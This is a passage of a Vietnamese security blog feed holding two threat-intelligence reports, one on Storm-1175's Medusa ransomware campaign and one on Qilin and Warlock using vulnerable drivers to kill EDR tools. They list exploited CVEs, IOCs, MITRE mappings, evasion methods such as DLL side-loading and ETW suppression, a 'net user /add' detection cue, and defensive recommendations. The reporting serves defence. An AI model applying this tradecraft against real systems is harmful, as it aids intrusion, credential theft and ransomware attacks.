<p><strong>Sàn diễn Zero-day Fortra GoAnywhere (Tháng 9/2025):</strong> Vũ khí hoá và nổ súng bằng mã lỗi Deserialization CVE-2025-10035 (thang điểm tử thần CVSS 10.0) khoan thủng đồng loạt các hệ thống MFT của doanh nghiệp. Đáng sợ là chúng đã dùng lỗ hổng này trước khi hãng tung bản vá trọn 1 tuần (Pre-disclosure).</p>
<p><strong>Đình trệ khối Y tế Bang Mississippi (Tháng 2/2026):</strong> Lan toả Medusa làm tê liệt hoàn toàn Trung tâm Y tế Đại học Mississippi (UMMC - cơ sở đầu não với 10.000 nhân viên). Vụ tấn công gây ra 9 ngày "mất điện máy tính", buộc trung tâm phải hủy lịch truyền hóa chất xạ trị cho bệnh nhân ung thư và quy trình hoạt động lui về thời kỳ sổ sách viết tay trước khi nộp đòi $800,000 USD tiền chuộc.</p>
<h2><strong>Timeline Sự kiện Điển hình</strong></h2>
<p>Lịch trình khai thác Zero-day "vượt rào" của Storm-1175 là minh chứng cho tốc độ đáng sợ:</p>
<p><strong>Tấn công Zero-day Fortra GoAnywhere (Tháng 9/2025):</strong></p>
<ul>
<li><p><em>Ngày 10-11/09:</em> Storm-1175 bắt đầu tấn công diện rộng qua lỗ hổng <code>CVE-2025-10035</code> (CVSS 10.0 - Deserialization).</p>
</li>
<li><p><em>Ngày 18/09:</em> Fortra mới chính thức phát hành bản vá và xác nhận lỗ hổng. (Tấn công đi trước công bố 1 tuần).</p>
</li>
</ul>
<p><strong>Tấn công Zero-day SmarterMail (Năm 2026):</strong></p>
<ul>
<li>Thực thi khai thác lỗi Authentication Bypass <code>CVE-2026-23760</code> cũng với độ trễ phản hồi của nhà cung cấp từ 7-10 ngày sau khi mã độc đã xâm nhập xong tổ chức.</li>
</ul>
<p><strong>Tiến trình Dwell Time:</strong> Diễn biến từ bước chiếm quyền ban đầu tới lúc khóa File bằng Medusa thường giới hạn dưới 6 ngày.</p>
<h2><strong>Chuỗi tấn công</strong></h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/60e4d2a3-176e-473f-903b-612e96aee7fe.png" alt="" style="display:block;margin:0 auto" />

<h3><strong>Giai đoạn 1: Initial Access (Đột nhập bằng Zero-day/N-day Web-facing)</strong></h3>
<p>Cơ sở dữ liệu ghi nhận Storm-1175 đã nã đạn thành công qua 16 lỗ hổng của hơn 10 nền tảng khác nhau. Các dịch vụ đứng mũi chịu sào bao gồm: Microsoft Exchange Server, PaperCut NG/MF, Ivanti Connect Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP và SmarterMail.</p>
<table>
<thead>
<tr>
<th><strong>Nền tảng Mục tiêu</strong></th>
<th><strong>Nhóm mã lỗi (CVE) bị khai thác</strong></th>
<th><strong>Đặc điểm/Kiểu tấn công</strong></th>
<th><strong>Tài liệu Bản vá (Patch Link)</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>Fortra GoAnywhere MFT</strong></td>
<td><code>CVE-2025-10035</code></td>
<td><strong>Zero-day</strong> (Deserialization, CVSS 10.0)</td>
<td><a href="https://www.fortra.com/security/advisories">Fortra Security Advisories</a></td>
</tr>
<tr>
<td><strong>SmarterTools SmarterMail</strong></td>
<td><code>CVE-2026-23760</code></td>
<td><strong>Zero-day</strong> (Authentication Bypass)</td>
<td><a href="https://www.smartertools.com/smartermail/release-notes">SmarterMail Release Notes</a></td>
</tr>
<tr>
<td><strong>ConnectWise ScreenConnect</strong></td>
<td><code>CVE-2024-1709</code></td>
<td>Authentication Bypass</td>
<td><a href="https://www.connectwise.com/company/trust/security-bulletins">ConnectWise Security Bulletins</a></td>
</tr>
<tr>
<td><strong>Ivanti Connect Secure</strong></td>
<td><code>CVE-2023-46805</code>, <code>CVE-2024-21887</code></td>
<td>Auth Bypass &amp; Command Injection</td>
<td><a href="https://forums.ivanti.com/s/security-advisory">Ivanti Security Advisories</a></td>
</tr>
<tr>
<td><strong>JetBrains TeamCity</strong></td>
<td><code>CVE-2024-27198</code>, <code>CVE-2024-27199</code></td>
<td>Authentication Bypass</td>
<td><a href="https://blog.jetbrains.com/teamcity/category/security/">TeamCity Security Blog</a></td>
</tr>
<tr>
<td><strong>SimpleHelp</strong></td>
<td><code>CVE-2024-57726</code>, <code>CVE-2024-57727</code>, <code>CVE-2024-57728</code></td>
<td>Lỗi thực thi viễn trình (RCE)</td>
<td><a href="https://simple-help.com/releases">SimpleHelp Releases Center</a></td>
</tr>
<tr>
<td><strong>CrushFTP</strong></td>
<td><code>CVE-2024-4040</code></td>
<td>VFS Sandbox Escape / Đọc file nhạy cảm</td>
<td><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update">CrushFTP Update Wiki</a></td>
</tr>
<tr>
<td><strong>PaperCut NG/MF</strong></td>
<td><code>CVE-2023-27350</code></td>
<td>Unauthenticated RCE</td>
<td><a href="https://www.papercut.com/kb/Main/Security-Bulletin">PaperCut Security Bulletin</a></td>
</tr>
<tr>
<td><strong>Microsoft Exchange Server</strong></td>
<td>Các hệ mã <code>ProxyShell</code> / <code>ProxyNotShell</code></td>
<td>Khai thác SSRF/RCE không cài bản vá cũ</td>
<td><a href="https://msrc.microsoft.com/update-guide/">MSRC Update Guide</a></td>
</tr>
</tbody></table>
<p><em>Việc Storm-1175 bao trọn kho exploit tác chiến từ máy chủ dịch vụ tệp tin (MFT), email server cho đến nền tảng quản trị viễn trình chứng tỏ đội ngũ R&amp;D đằng sau băng đảng này quét rà toàn bộ bề mặt mạng của doanh nghiệp chứ không bó hẹp ở một lỗ hổng cố định</em></p>
<h3><strong>Giai đoạn 2: Execution &amp; Persistence</strong></h3>
<p>Sau khi bẻ khoá, Storm-1175 không xài malware lạ mà cắm chốt bằng cách cấy Web shell thẳng vào ứng dụng vừa khai thác. Đáng chú ý, chúng tạo ra hàng loạt user trái phép và trải thảm bằng các hệ thống RMM (Remote Monitoring &amp; Management) thương mại hợp pháp để bám trụ: <code>Atera</code>, <code>Level</code>, <code>N-able</code>, <code>DWAgent</code>, <code>MeshAgent</code>, <code>AnyDesk</code>... Việc này giúp luồng C2 của chúng chìm lấp trong mớ traffic Quản trị mạng hằng ngày. Kẻ tấn công cũng hay dựng <code>Cloudflare tunnels</code> để ngụy trang luồng kết nối ngược (reverse shell).</p>
<h3>Giai đoạn 3: Credential Access &amp; Defense Evasion</h3>
<p>Để vét sạch thông tin xác thực, nhóm tặc sử dụng tổ hợp: <code>Mimikatz</code>, dump trực tiếp RAM LSASS qua Task Manager, bẻ cấu hình Registry <code>WDigest</code> để ép Windows nhớ plaintext password, và chạy script đánh cắp mật khẩu Veeam Backup. Kẻ thù trốn tránh EDR bằng cách thao túng Windows Firewall mở cổng RDP, và gạn lọc thêm các list Exclusion của Microsoft Defender Antivirus (Cấm phần mềm quét các thư mục chứa công cụ tống tiền).</p>
<h3><strong>Giai đoạn 4: Exfiltration &amp; Impact</strong></h3>
<p>Gom dữ liệu bằng <code>Bandizip</code> (Archive file) và tuồn lên hạ tầng lưu trữ đám mây của attacker bằng <code>Rclone</code>.</p>
<p>Khi dữ liệu đã sang tay, Storm-1175 sử dụng <code>PDQ Deployer</code> để vứt bọc mã hoá đồng loạt cho toàn mạng.</p>
<p>Ransomware <code>gaze.exe</code> kích hoạt, giã thuật toán AES-256 biến toàn bộ hệ thống file thành định dạng <code>.medusa</code> kèm theo yêu cầu tiền chuộc.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/30eb23fb-cdb1-4cd6-a059-1a62ea88bc9c.png" alt="" style="display:block;margin:0 auto" />

<h2><strong>Phân tích Tác động: Khủng hoảng Ngành Y tế</strong></h2>
<p>Sự kìm kẹp của Medusa đang hủy hoại sâu rộng tới khối y tế (Healthcare) — nơi máy móc lạc hậu và thời gian vô giá:</p>
<ul>
<li><p>Vụ sập mạng ảnh y khoa <strong>SimonMed Imaging</strong> (2TB dữ liệu ảnh hưởng 1.27 triệu bệnh nhân, tống tiền $1 triệu USD).</p>
</li>
<li><p>Viện y tế độc lập <strong>HCRG Care Group</strong> tại Anh Quốc (Chiếm 2.3TB, đòi ransom $2 triệu USD).</p>
</li>
<li><p>Trung tâm Y tế <strong>Đại học Mississippi</strong> (Chín ngày tê liệt toàn phần, phòng khám ung thư đình trệ, nộp đòi $800,000).</p>
</li>
</ul>
<p><em>Cảnh báo Tống tiền Ba Cấp (Triple Extortion):</em> Medusa còn dồn ép nạn nhân ở mức tàn nhẫn nhất. Có những trường hợp victim <em>đã trả tiền</em> giải mã, nhưng sau đó xuất hiện một "kẻ thứ ba" tự xưng là tay trong của Medusa liên hệ, bảo rằng bộ khóa cũ là đồ giả, và ép nạn nhân chuyển thêm tiền để có "True Decryptor".</p>
<h2>IOCs</h2>
<p><strong>File Hash</strong></p>
<p>0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96</p>
<p>9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c</p>
<p>e57ba1a4e323094ca9d747bfb3304bd12f3ea3be5e2ee785a3e656c3ab1e8086</p>
<p>5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19</p>
<p><strong>IP C2</strong></p>
<p>185.135.86[.]149</p>
<p>134.195.91[.]224</p>
<p>85.155.186[.]121</p>
<h2><strong>MITRE ATT&amp;CK Mapping</strong></h2>
<p><strong>TA0001 - Initial Access:</strong> T1190 (Exploit Public-Facing Application) qua các 0-day/N-day nghiêm trọng.</p>
<p><strong>TA0003 - Persistence:</strong> T1505.003 (Web Shell). T1136 (Create Account).</p>
<p><strong>TA0005 - Defense Evasion:</strong> T1562.001 (Disable or Modify Tools) - loại trừ thư mục khoá khỏi Windows Defender, T1562.004 (Disable or Modify System Firewall).</p>
<p><strong>TA0006 - Credential Access:</strong> T1003.001 (LSASS Memory), T1003.004 (LSA Secrets) - đánh password Veeam.</p>
<p><strong>TA0011 - Command and Control:</strong> T1219 (Remote Access Software) - lạm dụng Atera/AnyDesk, T1090.006 (Web Service) - Cloudflare tunnels.</p>
<p><strong>TA0010 - Exfiltration:</strong> T1567.002 (Exfiltration to Cloud Storage) - bằng Rclone.</p>
<p><strong>TA0040 - Impact:</strong> T1486 (Data Encrypted for Impact).</p>
<h2><strong>Nhận định chuyên gia</strong></h2>
<p>Cuộc hội tụ giữa kỹ năng bẻ khoá phần mềm Zero-day cấp độ Quốc Gia (Nation-State) với tư duy kiếm tiền tàn độc của Tội phạm băng đảng (RaaS) đã cấu thành cơn ác mộng lớn nhất trong mười năm trở lại đây. Storm-1175 đã chứng minh cho một hiện thực tàn khốc: <strong>"Window of Vulnerability" (Khung thời gian cho phép bạn chờ đến kỳ Patch hệ thống tiếp theo) đã bị kéo xuống bằng Không</strong>. Khi kẻ thù có nhã hứng săn các app Web-facing của doanh nghiệp, chúng đã bóp cò một tuần trước khi hãng phần mềm kịp gửi mail xin lỗi và phát hành CVE.</p>
<p>Hơn nữa, nếu công ty bạn chưa gỡ hoặc không quản lý cấu hình các giải pháp Remote Admin (RMM) một cách có chủ đích, bạn đang gián tiếp tự nuôi dưỡng backdoor hoàn hảo mọc lên giữa lòng hạ tầng mạng bảo mật của riêng mình.</p>
<h2><strong>Khuyến nghị</strong></h2>
<p><strong>Immediate (Tức thời 0-24h)</strong></p>
<ul>
<li><p>Áp bản vá (Patch) ở mức ưu tiên Emergency cho toàn bộ ứng dụng đang chĩa súng ra Internet, trọng tâm: Fortra GoAnywhere MFT, SmarterMail, ConnectWise ScreenConnect, Ivanti Connect Secure, JetBrains TeamCity.</p>
</li>
<li><p>Nếu không có sẵn patch bảo mật: Cô lập, dập truy cập Public hoặc chắn trước chúng bằng các WAF (Web Application Firewall) thiết lập rule signature khắt khe nhất để đánh chặn payload Deserialization.</p>
</li>
</ul>
<p><strong>Short-term (1-7 ngày)</strong></p>
<ul>
<li><p>Cấu hình lại cơ chế Threat Hunting nội bộ để bắt dị thường trong các tác vụ RMM. Nếu server phòng kế toán bỗng dưng cài AnyDesk hay phần mềm Cloudflare Tunnel chạy dịch vụ ngầm, đó là Level 1 Incident.</p>
</li>
<li><p>Theo dõi các event ID đọc/ghi memory của <code>LSASS.exe</code> ở mức cao nhất. Viết logic cảnh báo đối với thao tác gỡ lớp rào File Exclusion của Defender Antivirus thông qua PowerShell/CMD.</p>
</li>
</ul>
<p><strong>Long-term</strong></p>
<ul>
<li><p>Chấp nhận chiến lược kiến trúc "Zero Trust cho Perimeter". Hiểu rằng máy chủ Public-facing dù có update mới nhất vẫn có thể bị dính 0-day bất kỳ lúc nào. Áp dụng kỹ thuật Micro-segmentation để nhốt dính máy chủ web nếu chúng bị lây nhiễm, chặn kết nối đâm chéo (lateral movement) vào server Core.</p>
</li>
<li><p>Thiết kế máy chủ Backup và hệ thống Veeam tách riêng rẽ hoàn toàn khỏi các Domain Controller credential bề mặt để tránh bị đánh sập cả cụm. Triển khai phương thức Offline Backup Test dành riêng cho tình huống khủng hoảng.</p>
</li>
</ul>
<h2>Tham khảo</h2>
<p><a href="https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html">https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html</a></p>
<p><a href="https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/">https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/</a></p>
<p><a href="https://labs.cloudsecurityalliance.org/research/csa-research-note-storm1175-medusa-ransomware-zero-day-20260/">https://labs.cloudsecurityalliance.org/research/csa-research-note-storm1175-medusa-ransomware-zero-day-20260/</a></p>
]]></content:encoded></item><item><title><![CDATA[Hệ thống phòng thủ bị vô hiệu hóa như thế nào? Bên trong chiến dịch của Qilin & Warlock]]></title><description><![CDATA[Tóm tắt chiến dịch
Hai nhóm Ransomware-as-a-Service (RaaS) khét tiếng là Qilin và Warlock (hay còn gọi là Water Manaul) đang độc lập triển khai kỹ thuật "Bring Your Own Vulnerable Driver" (BYOVD) ở cấ]]></description><link>https://blog.fiscybersec.com/h-th-ng-ph-ng-th-b-v-hi-u-h-a-nh-th-n-o-b-n-trong-chi-n-d-ch-c-a-qilin-warlock</link><guid isPermaLink="true">https://blog.fiscybersec.com/h-th-ng-ph-ng-th-b-v-hi-u-h-a-nh-th-n-o-b-n-trong-chi-n-d-ch-c-a-qilin-warlock</guid><category><![CDATA[qilin]]></category><category><![CDATA[warlock]]></category><category><![CDATA[Ransomware-as-a-Service (RaaS)]]></category><category><![CDATA[BYOVD]]></category><category><![CDATA[EDR]]></category><category><![CDATA[DLL loading]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Thu, 09 Apr 2026 03:07:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/6e489184-ed37-42aa-ae76-ec10ce0b68d3.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tóm tắt chiến dịch</h2>
<p>Hai nhóm Ransomware-as-a-Service (RaaS) khét tiếng là <strong>Qilin</strong> và <strong>Warlock</strong> (hay còn gọi là Water Manaul) đang độc lập triển khai kỹ thuật <strong>"Bring Your Own Vulnerable Driver" (BYOVD)</strong> ở cấp độ Kernel. Mục tiêu của chúng là chủ động "giết" các tiến trình Endpoint Detection and Response (EDR) trước khi giải phóng tải trọng mã hóa. Nghiên cứu xác nhận các bộ công cụ này có khả năng vô hiệu hóa hơn 300 EDR driver thuộc gần như toàn bộ các hãng bảo mật lớn trên thị trường hiện nay.</p>
<p>Mức độ báo động của chiến dịch <strong>Qilin</strong> đã được chứng minh qua số liệu thực tế: Trong năm 2025, lượng sự cố ransomware tại Nhật Bản tăng 17.5%, trong đó Qilin chiếm tỷ trọng lớn nhất với 16.4% tổng số ca nhiễm, nhắm mạnh vào các ngành sản xuất và thiết bị ô tô. Việc vũ khí hóa BYOVD vốn từng là đặc quyền của các nhóm Nation-State APT, nhưng nay nó đã bị thương mại hóa cho các nhóm lợi ích tài chính.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/5fd0a949-0f25-414f-8bfe-87df774e3d83.png" alt="" style="display:block;margin:0 auto" />

<p>Hành động cấp thiết nhất dành cho mọi tổ chức: Kích hoạt ngay tính năng toàn vẹn mã được bảo vệ bởi Hypervisor (HVCI - Memory Integrity) và cập nhật tức thì danh sách Microsoft Vulnerable Driver Blocklist trên toàn bộ phân vùng Windows.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/c5a087b8-b383-407d-a706-377170fddfb7.png" alt="" style="display:block;margin:0 auto" />

<h2><strong>Hồ sơ Nhóm Tin tặc</strong></h2>
<p>Đứng sau chiến dịch BYOVD quy mô lớn này là hai tổ chức ngầm độc lập nhưng sở hữu năng lực đáng gờm:</p>
<p><strong>Nhóm Qilin:</strong> Một băng đảng RaaS (Ransomware-as-a-Service) có dấu hiệu căn cứ tại khu vực hậu Xô Viết (Post-Soviet region). Bằng chứng rõ nét nhất nằm ở module EDR Killer của nhóm được tích hợp "Geo-fencing" nhằm ngăn mã độc kích hoạt trên các hệ thống dùng nhóm ngôn ngữ khu vực này, giúp chúng lách luật trừng phạt nội địa. Hiện tại, Qilin vươn lên trở thành nhóm vận hành mã độc tốn giấy mực nhất với lượng nạn nhân tống tiền tăng vọt, tiêu biểu như sức phá hoại chiếm tỉ trọng lớn nhất trong các cuộc tấn công tại Nhật Bản nửa đầu 2025.</p>
<p><strong>Nhóm Warlock (hay Water Manaul):</strong> Băng đảng RaaS khai thác triệt để nhánh mã độc tống tiền rẽ nhánh từ LockBit (phân phối payload mã hóa chấm đuôi <code>.x2anylock</code>). Hành vi đặc thù của Warlock là tận dụng sự đình trệ trong quy trình vá lỗi máy chủ Microsoft SharePoint của quản trị viên và nhẫn trường "nằm vùng" tới 15 ngày để thâu tóm hoàn toàn cấu hình Domain Controller trước khi giáng mạng lưới mã hóa diện rộng qua GPO.</p>
<h2><strong>Timeline Sơ Bộ</strong></h2>
<p><strong>Tiền khởi chạy:</strong> Qilin trích xuất thông tin đăng nhập bị đánh cắp trên Darknet hoặc Breach Forums. Warlock lợi dụng các máy chủ Microsoft SharePoint công khai chưa vá lỗi lõi.</p>
<p><strong>Dwell Time:</strong> Từ khi bắt đầu xâm nhập đến khi thả mã hóa, Qilin mất trung bình khoảng 6 ngày. Trong khi đó, nhóm Warlock sẵn sàng nằm vùng (dwell time) lên tới 15 ngày để trích xuất dữ liệu và dàn xếp kịch bản GPO trước khi tấn công.</p>
<p><strong>Thực thi:</strong> Khởi động BYOVD driver diệt EDR, mã hóa và thiết lập mô hình tống tiền kép.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/faaa4697-56bf-4409-bdd8-43890f4e21bb.png" alt="" style="display:block;margin:0 auto" />

<h2><strong>Kill Chain &amp; Attack Flow</strong></h2>
<h3><strong>Giai đoạn 1: Initial Access</strong></h3>
<p><strong>Qilin:</strong> Chiếm quyền qua lỗ hổng trên dịch vụ internet-facing, phishing hoặc credential nộp trên web đen.</p>
<p><strong>Warlock:</strong> Khai thác vào lỗ hổng chưa vá trên các dịch vụ Microsoft SharePoint.</p>
<h3><strong>Giai đoạn 2: Execution &amp; Persistence</strong></h3>
<p><strong>Qilin:</strong> Dùng <code>FoxitPDFReader.exe</code> hợp lệ để nhúng (side-load) một DLL độc hại <code>msimg32.dll</code>.</p>
<p><strong>Warlock:</strong> Thả Web Shell để mở cổng C2 và dùng công cụ TightVNC được ngụy trang thành một Windows Service mặc định để bám trụ mạng.</p>
<h3><strong>Giai đoạn 3: Defense Evasion &amp; Credential Access</strong></h3>
<p><strong>Qilin:</strong> Cắt đứt luồng giám sát Event Tracing for Windows (ETW), áp dụng cơ chế Halo's Gate để bypass các API syscall hook, sau đó thả kernel driver <code>hlpdrv.sys</code> để tắt luôn EDR.</p>
<p><strong>Warlock:</strong> Cấy <code>NSecKrnl.sys</code> chạy tự do ngầm dưới kernel nhằm đóng băng EDR, sau đó triển khai Rclone ngụy trang dưới các file Security giả mạo (<code>TrendSecurity.exe</code>) nhằm đẩy dữ liệu ra ngỏ hậu.</p>
<h3><strong>Giai đoạn 4: Impact (Ransomware Execution)</strong></h3>
<p>Qilin mã hóa các file theo tiêu chuẩn mở. Trái lại, Warlock cấu hình mã hóa đồng loạt trên diện rộng qua Active Directory GPO, đẩy payloads xuống các folder SYSVOL / NETLOGON và ép máy nạn nhân chạy khi reboot. File bị khóa có đuôi <code>.x2anylock</code>.</p>
<h2><strong>Phân tích kỹ thuật chi tiết</strong></h2>
<p>Sự thay đổi cốt lõi trong các chiến dịch mới này là <strong>chuỗi EDR Killer ở cấp Kernel</strong>.</p>
<p><strong>Cơ chế bypass In-Memory của Qilin:</strong> Khác với các phương thức dừng tiến trình thô bạo (dễ bị phát hiện), Qilin sử dụng một chuỗi nạp DLL (<code>msimg32.dll</code>) tinh chỉnh cực kỳ phức tạp. Tính chất nguy hiểm nhất là toàn bộ chuỗi này thi triển trên bộ nhớ RAM (In-Memory) nhằm qua mặt mọi máy quét ổ cứng, diễn ra lần lượt theo 4 chặng:</p>
<p><strong>Chặng 1 — Chiếm quyền ưu tiên nạp DLL (Search Order Hijacking):</strong> Kẻ tấn công thả một file <code>msimg32.dll</code> giả mạo nằm cùng thư mục với phần mềm đọc PDF hợp lệ (ví dụ: <code>FoxitPDFReader.exe</code>). Khi quản trị viên hoặc hệ thống chạy phần mềm PDF, Windows vô tình bị lừa nạp luôn file DLL giả mạo thay vì file gốc của hệ điều hành. Để tránh gây nghi ngờ vì crash phần mềm, DLL độc hại sẽ âm thầm "chuyển tiếp" (forward) mọi phản hồi hợp pháp về lại file <code>msimg32.dll</code> hàng "xịn" đang ngự ở <code>C:\Windows\System32\</code>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/43f4d35e-3d98-4c97-bf5d-f0c6d949a0eb.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Chặng 2 — Giải mã và lẩn trốn trên RAM (Multi-Stage In-Memory Loader):</strong> Tiếp theo, đoạn mã độc tự giải nén chính nó qua ba tiến trình liên tiếp trên bộ nhớ tạm (không hề chạm đĩa). Để đối phó với các cơ chế phòng thủ tân tiến, chúng triển khai một rào chắn hoàn hảo: Tắt hệ thống ghi log mặc định của Windows (ETW suppression) để bách độc tín hiệu, dùng phương thức "Halo's Gate" nhằm luồn lách qua các móc chặn kiểm tra (syscall hooks) của hệ điều hành, đồng thời ngụy trang rối rắm luồng thực thi (thông qua SEH/VEH obfuscation) làm nản lòng bất kì chuyên gia đảo ngược vi mã (Reverse Engineer) nào đổ mồ hôi phân tích rác RAM.</p>
<p><strong>Chặng 3 — Hạ thổ vũ khí diệt EDR (BYOVD Deployment):</strong> Chỉ khi các lá chắn ẩn danh đã giăng kín, khối payload trên RAM mới lẳng lặng thả đúng 2 file driver xuống thư mục bộ nhớ rác <code>%TEMP%</code>. File đầu tiên là <code>rwdrv.sys</code> – vỏ bọc của driver <code>ThrottleStop.sys</code> (được cấp chữ ký tin cậy từ tập đoàn bên thứ 3 nhưng mang lỗi nghiêm trọng về quản lý quyền), cho phép ứng dụng đọc/ghi thẳng vào cấu trúc cấu hình gốc của CPU. File thứ hai là <code>hlpdrv.sys</code>, sẽ "ké" quyền cấm lách đạo từ file thứ nhất để ra thẳng lệnh truy sát tiến trình tự vệ trên các ứng dụng bảo mật.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/81f5c291-3ec6-41ba-a1d7-7848aca43dc6.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Chặng 4 — "Thảm sát" EDR trong im lặng:</strong> Qilin không kill EDR một cách lộ liễu. Trước khi ra tay rút ống thở, driver độc hại dùng quyền hạn chiếm được lẳng lặng tháo sạch mọi "camera an ninh" (EDR monitoring callbacks) mà phần mềm bảo vệ đã cắm vào lõi HĐH. Tiến trình EDR bị mù từ bên trong và tắt lịm, hoàn toàn không đẩy kịp bất kì cảnh báo sập nguồn nào về cho máy chủ trung tâm (SOC). Khi khiên bảo vệ triệt để tan biến, ransomware bắt đầu cuộc thảm sát mã hoá tập tin.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7a9fd121-89c9-414c-97ec-aa14d8c95a2d.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7fcdac82-5aa0-4c76-8a02-bbf34feaebf2.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Cơ chế BYOVD của Warlock:</strong> Ở một mặt trận khác, thay vì dùng driver cũ <code>googleApiUtil64.sys</code> như đầu năm, Warlock nay đã chuyển qua sử dụng bản nâng cấp <code>NSecKrnl.sys</code>. Chiến thuật đánh lừa EDR kết hợp thao tác ẩn thân qua việc đổi tên trực tiếp file độc hại thành "TrendFileSecurityCheck.exe". Đây là nghệ thuật hòa mình vào môi trường giả tạo (Ngụy trang thành quy trình quét hợp lệ của phần mềm Trend Micro) khiến phần mềm phân tích tín hiệu dễ làm ngơ với luồng dữ liệu đánh tráo.</p>
<h2>IOCs</h2>
<p><strong>Các file độc hại (Hash SHA-256)</strong></p>
<p>7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497</p>
<p>16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0</p>
<p>bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56</p>
<p><strong>Network Indicators (C2)</strong></p>
<p>198[.]13[.]158[.]193</p>
<h2><strong>MITRE ATT&amp;CK Mapping</strong></h2>
<p><strong>TA0001 - Initial Access:</strong> T1190 (Exploit Public-Facing Application) - Nhắm vào SharePoint.</p>
<p><strong>TA0002 - Execution:</strong> T1569.002 (Service Execution) - Khởi chạy Windows Services.</p>
<p><strong>TA0003 - Persistence:</strong> T1543.003 (Windows Service) - TightVNC cài qua PsExec.</p>
<p><strong>TA0005 - Defense Evasion:</strong> T1574.002 (DLL Side-Loading), T1068 (Exploitation for Privilege Escalation - BYOVD), T1562.001 (Disable or Modify Tools - Tắt EDR driver).</p>
<p><strong>TA0011 - Command and Control:</strong> T1090.003 (Multi-hop Proxy) - Dùng SOCKS5 Yuze, VS Code tunnel, Cloudflare Tunnel.</p>
<h2><strong>Nhận định chuyên gia</strong></h2>
<p>Những cuộc tấn công trên phá vỡ niềm tin sai lầm rằng: Chỉ cần có một sản phẩm EDR đắt tiền là đủ để bảo vệ Endpoint. Bằng việc tận dụng một file driver (như ThrottleStop) vô hại nhưng chứa lỗi thiết kế quyền Memory (mở đường cho BYOVD), mã độc RaaS hiện tại tự động khóa chặt cả một EDR pipeline trong tích tắc mà trung tâm SOC thậm chí không nhận được một log sự cố nào.</p>
<p>Chỉ số 6 đến 15 ngày dwell time trong chiến dịch này cho thấy lỗ hổng cực kì lớn về mặt "Pre-Ransomware Detection". Nếu SOC team không có khả năng phát hiện các hành vi bất thường, giả dụ như các lệnh <code>net user /add</code> chạy liên tục vào lúc rạng sáng, RaaS group sẽ coi những đặc quyền này như bãi thử tự do cho việc thả lỏng chuỗi DLL injection. Hơn thế nữa, RaaS đã chính thức kéo ngang năng lực kỹ thuật của một cuộc tấn công tống tiền so với các cuộc tấn công cấp quốc gia.</p>
<h2>Khuyến nghị</h2>
<p><strong>Immediate (Tức thời 0-24h)</strong></p>
<ul>
<li><p>Bật ngay tính năng <strong>Hypervisor-Protected Code Integrity (HVCI - Memory Integrity)</strong> trên tất cả Endpoint chạy Windows (nằm trong Windows Security &gt; Device Security &gt; Core Isolation). HVCI là chốt chặn quan trọng nhất ép ngừng việc nhúng file <code>rwdrv.sys</code> hoặc <code>NSecKrnl.sys</code>.</p>
</li>
<li><p>Triển khai Windows Defender Application Control (WDAC) import danh sách theo chuẩn <strong>Microsoft Vulnerable Driver Blocklist</strong>.</p>
</li>
</ul>
<p><strong>Short-term (1-7 ngày)</strong></p>
<ul>
<li><p>Xây dựng luật cảnh báo nội bộ (EDR/SIEM/Sysmon): Đánh dấu bất kì quá trình gọi file <code>msimg32.dll</code> nào mà nằm ngoài thư mục <code>C:\Windows\System32</code>. Cổng side-loading thường diễn ra qua <code>FoxitPDFReader.exe</code> hoac <code>7-Zip</code>.</p>
</li>
<li><p>Kích hoạt luật cảnh báo khi một service hệ thống mới được cài đặt (Event ID 7045) hoặc có báo lỗi tải driver (Event ID 219) liên quan các vùng <code>%TEMP%</code>, <code>SYSVOL</code>. Cụ thể: Khai báo Sysmon quét các Event ID 6 (DriverLoad).</p>
</li>
</ul>
<p><strong>Long-term</strong></p>
<ul>
<li><p>Quản lý siêu chặt chẽ hạ tầng Group Policy. Kịch bản tống tiền qua AD của Warlock phụ thuộc hoàn toàn vào quá trình ghi payload vào thư mục <code>SYSVOL</code> để ép Domain Controller cài đè ransomware cho các nhánh client con. Chuyển đổi mô hình thành Tiered administration để thu hẹp phạm vi tổn thất (blast radius) trong môi trường bị bẻ khóa.</p>
</li>
<li><p>Quán triệt việc vá lỗi ứng dụng Web, đặc biệt ngay trên Microsoft SharePoint.</p>
</li>
</ul>
<h2>Tham khảo</h2>
<p><a href="https://thehackernews.com/2026/04/qilin-and-warlock-ransomware-use.html">Qilin and Warlock Ransomware Use Vulnerable Drivers to Disable 300+ EDR Tools</a></p>
